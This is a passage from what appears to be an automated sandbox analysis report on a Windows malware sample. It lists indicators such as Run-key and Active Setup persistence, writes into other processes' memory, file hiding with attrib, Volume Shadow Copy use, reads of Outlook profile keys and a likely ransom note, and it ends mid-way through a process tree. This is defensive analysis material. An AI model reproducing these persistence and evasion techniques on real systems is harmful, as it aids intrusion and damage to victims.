5396	taskkill.exe
6704	taskkill.exe
5464	taskkill.exe
6760	taskkill.exe
4492	taskkill.exe
4484	taskkill.exe
6412	taskkill.exe
5852	taskkill.exe
3372	taskkill.exe
6500	taskkill.exe
6632	taskkill.exe
6600	taskkill.exe
5176	taskkill.exe
4576	taskkill.exe
1764	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634647276295457"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 60 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "3"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000115b158a40a1da0182ed9fe600c4da018a6a8c5501c4da0114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{540A8A38-B413-4D28-A467-D2F5514356AE}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe

Modifies registry key 1 TTPs 11 IoCs

Modify Registry

T1112

pid	Process
988	reg.exe
1052	reg.exe
4184	reg.exe
5128	reg.exe
3976	reg.exe
5036	reg.exe
6520	reg.exe
3588	reg.exe
4888	reg.exe
808	reg.exe
6196	reg.exe

Opens file in notepad (likely ransom note) 6 IoCs

ransomware

pid	Process
6460	NOTEPAD.EXE
5948	NOTEPAD.EXE
5092	NOTEPAD.EXE
7128	NOTEPAD.EXE
7072	NOTEPAD.EXE
3172	NOTEPAD.EXE

Runs .reg file with regedit 4 IoCs

pid	Process
4972	regedit.exe
5932	regedit.exe
4232	regedit.exe
5416	regedit.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1860	chrome.exe
1860	chrome.exe
5540	msedge.exe
5540	msedge.exe
6740	chrome.exe
6740	chrome.exe
972	msedge.exe
972	msedge.exe
6876	mspaint.exe
6876	mspaint.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
5616	7zFM.exe
2912	OpenWith.exe
3628	server.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	4332	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	4480	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	2624	taskkill.exe
Token: SeDebugPrivilege	2056	taskkill.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	2328	taskkill.exe
Token: SeDebugPrivilege	4380	taskkill.exe
Token: SeDebugPrivilege	776	taskkill.exe
Token: SeDebugPrivilege	5320	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5688	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5760	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	6032	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5532	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5724	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5900	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5600	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5464	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5484	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	6100	307omiof.exe
Token: SeDebugPrivilege	6044	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	3528	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	4864	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5876	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeDebugPrivilege	1384	taskkill.exe
Token: SeShutdownPrivilege	1860	chrome.exe
Token: SeCreatePagefilePrivilege	1860	chrome.exe
Token: SeBackupPrivilege	6320	vssvc.exe
Token: SeRestorePrivilege	6320	vssvc.exe
Token: SeAuditPrivilege	6320	vssvc.exe

Suspicious use of FindShellTrayWindow 61 IoCs

pid	Process
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
5616	7zFM.exe
5616	7zFM.exe
5616	7zFM.exe
5616	7zFM.exe
5616	7zFM.exe
5616	7zFM.exe
5616	7zFM.exe
5616	7zFM.exe
5616	7zFM.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
6460	NOTEPAD.EXE

Suspicious use of SendNotifyMessage 42 IoCs

pid	Process
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe
1860	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
3652	javaw.exe
1752	java.exe
3628	server.exe
4372	javaw.exe
2788	java.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
7028	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe
2912	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4956 wrote to memory of 2196	4956	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	97
PID 4956 wrote to memory of 2196	4956	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	97
PID 4956 wrote to memory of 2196	4956	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	97
PID 4956 wrote to memory of 2196	4956	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	97
PID 4956 wrote to memory of 2196	4956	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	97
PID 2196 wrote to memory of 3628	2196	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	98
PID 2196 wrote to memory of 3628	2196	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	98
PID 2196 wrote to memory of 3628	2196	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	98
PID 2196 wrote to memory of 3652	2196	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	100
PID 2196 wrote to memory of 3652	2196	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	100
PID 3628 wrote to memory of 3544	3628	server.exe	101
PID 3628 wrote to memory of 3544	3628	server.exe	101
PID 3628 wrote to memory of 3544	3628	server.exe	101
PID 3652 wrote to memory of 2560	3652	javaw.exe	102
PID 3652 wrote to memory of 2560	3652	javaw.exe	102
PID 3628 wrote to memory of 3400	3628	server.exe	104
PID 3628 wrote to memory of 3400	3628	server.exe	104
PID 3628 wrote to memory of 4892	3628	server.exe	105
PID 3628 wrote to memory of 4892	3628	server.exe	105
PID 3628 wrote to memory of 4892	3628	server.exe	105
PID 3652 wrote to memory of 1752	3652	javaw.exe	106
PID 3652 wrote to memory of 1752	3652	javaw.exe	106
PID 3628 wrote to memory of 4276	3628	server.exe	108
PID 3628 wrote to memory of 4276	3628	server.exe	108
PID 3628 wrote to memory of 4428	3628	server.exe	109
PID 3628 wrote to memory of 4428	3628	server.exe	109
PID 3628 wrote to memory of 4428	3628	server.exe	109
PID 3628 wrote to memory of 3200	3628	server.exe	110
PID 3628 wrote to memory of 3200	3628	server.exe	110
PID 3628 wrote to memory of 4208	3628	server.exe	111
PID 3628 wrote to memory of 4208	3628	server.exe	111
PID 3628 wrote to memory of 4208	3628	server.exe	111
PID 3628 wrote to memory of 4208	3628	server.exe	111
PID 3652 wrote to memory of 1984	3652	javaw.exe	112
PID 3652 wrote to memory of 1984	3652	javaw.exe	112
PID 1984 wrote to memory of 2256	1984	cmd.exe	114
PID 1984 wrote to memory of 2256	1984	cmd.exe	114
PID 1752 wrote to memory of 3836	1752	java.exe	115
PID 1752 wrote to memory of 3836	1752	java.exe	115
PID 3628 wrote to memory of 4960	3628	server.exe	117
PID 3628 wrote to memory of 4960	3628	server.exe	117
PID 3628 wrote to memory of 468	3628	server.exe	118
PID 3628 wrote to memory of 468	3628	server.exe	118
PID 3628 wrote to memory of 468	3628	server.exe	118
PID 3836 wrote to memory of 3148	3836	cmd.exe	119
PID 3836 wrote to memory of 3148	3836	cmd.exe	119
PID 3652 wrote to memory of 936	3652	javaw.exe	120
PID 3652 wrote to memory of 936	3652	javaw.exe	120
PID 936 wrote to memory of 1244	936	cmd.exe	122
PID 936 wrote to memory of 1244	936	cmd.exe	122
PID 1752 wrote to memory of 1404	1752	java.exe	123
PID 1752 wrote to memory of 1404	1752	java.exe	123
PID 3628 wrote to memory of 468	3628	server.exe	118
PID 1404 wrote to memory of 3080	1404	cmd.exe	125
PID 1404 wrote to memory of 3080	1404	cmd.exe	125
PID 3652 wrote to memory of 4852	3652	javaw.exe	126
PID 3652 wrote to memory of 4852	3652	javaw.exe	126
PID 1752 wrote to memory of 388	1752	java.exe	128
PID 1752 wrote to memory of 388	1752	java.exe	128
PID 3628 wrote to memory of 4264	3628	server.exe	130
PID 3628 wrote to memory of 4264	3628	server.exe	130
PID 3628 wrote to memory of 1152	3628	server.exe	131
PID 3628 wrote to memory of 1152	3628	server.exe	131
PID 3628 wrote to memory of 1152	3628	server.exe	131

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 22 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6712	attrib.exe
7136	attrib.exe
972	attrib.exe
6716	attrib.exe
6992	attrib.exe
6208	attrib.exe
1476	attrib.exe
3192	attrib.exe
2100	attrib.exe
6988	attrib.exe
60	attrib.exe
5948	attrib.exe
6724	attrib.exe
3008	attrib.exe
7152	attrib.exe
3064	attrib.exe
1188	attrib.exe
6524	attrib.exe
6612	attrib.exe
4504	attrib.exe
5560	attrib.exe
6200	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	307omiof.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	307omiof.exe

C:\Users\Admin\AppData\Local\Temp\ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4956
- C:\Users\Admin\AppData\Local\Temp\ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Users\Admin\AppData\Local\Temp\server.exe
    "C:\Users\Admin\AppData\Local\Temp\server.exe"
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3628
  - - C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      4⤵
      PID:3544
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:3400
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:4892
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:4276
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:4428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:3200
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:4208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
